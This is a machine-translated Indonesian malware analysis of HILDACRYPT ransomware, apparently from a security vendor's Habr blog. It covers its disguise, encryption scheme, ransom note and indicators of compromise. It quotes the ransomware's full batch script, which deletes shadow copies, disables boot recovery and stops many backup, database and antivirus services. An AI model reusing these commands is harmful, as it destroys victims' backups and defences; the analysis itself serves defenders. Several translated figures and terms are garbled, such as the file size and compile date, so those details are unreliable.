Halo, Habr! Sekali lagi, kita berbicara tentang malware versi terbaru dari kategori Ransomware. HILDACRYPT adalah ransomware baru, yang ditemukan oleh anggota keluarga Hilda pada Agustus 2019, dinamai berdasarkan kartun Netflix yang digunakan untuk mendistribusikan perangkat lunak tersebut. Hari ini kita berkenalan dengan fitur teknis dari virus ransomware yang diperbarui ini.
Dalam versi pertama ransomware Hilda, tautan ke salah satunya diposting di Youtube serial kartun itu dimuat dalam surat tebusan. HILDACRYPT menyamar sebagai penginstal XAMPP yang sah, distribusi Apache yang mudah dipasang yang mencakup MariaDB, PHP, dan Perl. Pada saat yang sama, cryptolocker memiliki nama file yang berbeda - xamp. Selain itu, file ransomware tidak memiliki tanda tangan elektronik.
Analisis statis
Ransomware terkandung dalam file PE32 .NET yang ditulis untuk MS Windows. Ukurannya adalah 135 byte. Baik kode program utama maupun kode program pembela ditulis dalam C#. Berdasarkan cap tanggal dan waktu kompilasi, biner tersebut dibuat pada 168 September 14.
Menurut Detect It Easy, ransomware diarsipkan menggunakan Confuser dan ConfuserEx, tetapi obfuscator ini sama seperti sebelumnya, hanya ConfuserEx yang merupakan penerus Confuser, sehingga tanda tangan kodenya serupa.
HILDACRYPT memang dikemas dengan ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Vektor serangan
Kemungkinan besar, ransomware ditemukan di salah satu situs pemrograman web, menyamar sebagai program XAMPP yang sah.
Seluruh rantai penularan dapat dilihat di .
Kebingungan
String ransomware disimpan dalam bentuk terenkripsi. Saat diluncurkan, HILDACRYPT mendekripsinya menggunakan Base64 dan AES-256-CBC.
Instalasi
Pertama-tama, ransomware membuat folder di %AppDataRoaming% di mana parameter GUID (Globally Unique Identifier) dihasilkan secara acak. Dengan menambahkan file bat ke lokasi ini, virus ransomware meluncurkannya menggunakan cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat & keluar
Kemudian mulai mengeksekusi skrip batch untuk menonaktifkan fitur atau layanan sistem.
Skrip berisi daftar panjang perintah yang menghancurkan salinan bayangan, menonaktifkan server SQL, pencadangan, dan solusi antivirus.
Misalnya, upaya menghentikan layanan Pencadangan Acronis tidak berhasil. Selain itu, ia menyerang sistem cadangan dan solusi antivirus dari vendor berikut: Veeam, Sophos, Kaspersky, McAfee, dan lainnya.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Setelah layanan dan proses yang disebutkan di atas dinonaktifkan, cryptolocker mengumpulkan informasi tentang semua proses yang berjalan menggunakan perintah daftar tugas untuk memastikan bahwa semua layanan yang diperlukan tidak aktif.
daftar tugas v/fo csv
Perintah ini menampilkan daftar rinci proses yang berjalan, yang elemen-elemennya dipisahkan oleh tanda “,”.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Setelah pemeriksaan ini, ransomware memulai proses enkripsi.
Enkripsi
Enkripsi file
HILDACRYPT menelusuri semua konten hard drive yang ditemukan, kecuali folder Recycle.Bin dan Referen AssembliesMicrosoft. Yang terakhir berisi file penting dll, pdb, dll. untuk aplikasi .Net yang dapat memengaruhi pengoperasian ransomware. Untuk mencari file yang akan dienkripsi, daftar ekstensi berikut digunakan:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Ransomware ini menggunakan algoritma AES-256-CBC untuk mengenkripsi file pengguna. Ukuran kuncinya adalah 256 bit dan ukuran vektor inisialisasi (IV) adalah 16 byte.
Pada screenshot berikut, nilai byte_2 dan byte_1 diperoleh secara acak menggunakan GetBytes().
Ключ
DALAM DAN
File terenkripsi memiliki ekstensi HCY!.. Ini adalah contoh file terenkripsi. Kunci dan IV yang disebutkan di atas dibuat untuk file ini.
Enkripsi kunci
Cryptolocker menyimpan kunci AES yang dihasilkan dalam file terenkripsi. Bagian pertama dari file terenkripsi memiliki header yang berisi data seperti HILDACRYPT, KEY, IV, FileLen dalam format XML, dan terlihat seperti ini:
Enkripsi kunci AES dan IV dilakukan menggunakan RSA-2048, dan pengkodean dilakukan menggunakan Base64. Kunci publik RSA disimpan di badan cryptolocker dalam salah satu string terenkripsi dalam format XML.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
Kunci publik RSA digunakan untuk mengenkripsi kunci file AES. Kunci publik RSA dikodekan Base64 dan terdiri dari modulus dan eksponen publik 65537. Dekripsi memerlukan kunci pribadi RSA, yang dimiliki penyerang.
Setelah enkripsi RSA, kunci AES dikodekan menggunakan Base64 yang disimpan dalam file terenkripsi.
Pesan tebusan
Setelah enkripsi selesai, HILDACRYPT menulis file html ke folder tempat file dienkripsi. Pemberitahuan ransomware berisi dua alamat email dimana korban dapat menghubungi penyerang.
Pemberitahuan pemerasan juga memuat kalimat “Tidak ada loli yang aman;)” - mengacu pada karakter anime dan manga dengan penampilan gadis kecil yang dilarang di Jepang.
Keluaran
HILDACRYPT, keluarga ransomware baru, telah merilis versi baru. Model enkripsi mencegah korban mendekripsi file yang dienkripsi oleh ransomware. Cryptolocker menggunakan metode perlindungan aktif untuk menonaktifkan layanan perlindungan yang terkait dengan sistem cadangan dan solusi antivirus. Penulis HILDACRYPT adalah penggemar serial animasi Hilda yang ditayangkan di Netflix, tautan ke trailernya terdapat dalam surat pembelian program versi sebelumnya.
Seperti biasa, и dapat melindungi komputer Anda dari ransomware HILDACRYPT, dan penyedia memiliki kemampuan untuk melindungi pelanggan mereka dengan . Perlindungan dijamin oleh fakta bahwa solusi ini mencakup tidak hanya mencakup cadangan, tetapi juga sistem keamanan terintegrasi kami - Didukung oleh model pembelajaran mesin dan berdasarkan heuristik perilaku, sebuah teknologi yang mampu melawan ancaman ransomware zero-day yang tiada duanya.
Indikator kompromi
Ekstensi file HCY!
HILDACRYPTReadMe.html
xamp.exe dengan satu huruf "p" dan tanpa tanda tangan digital
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Sumber: www.habr.com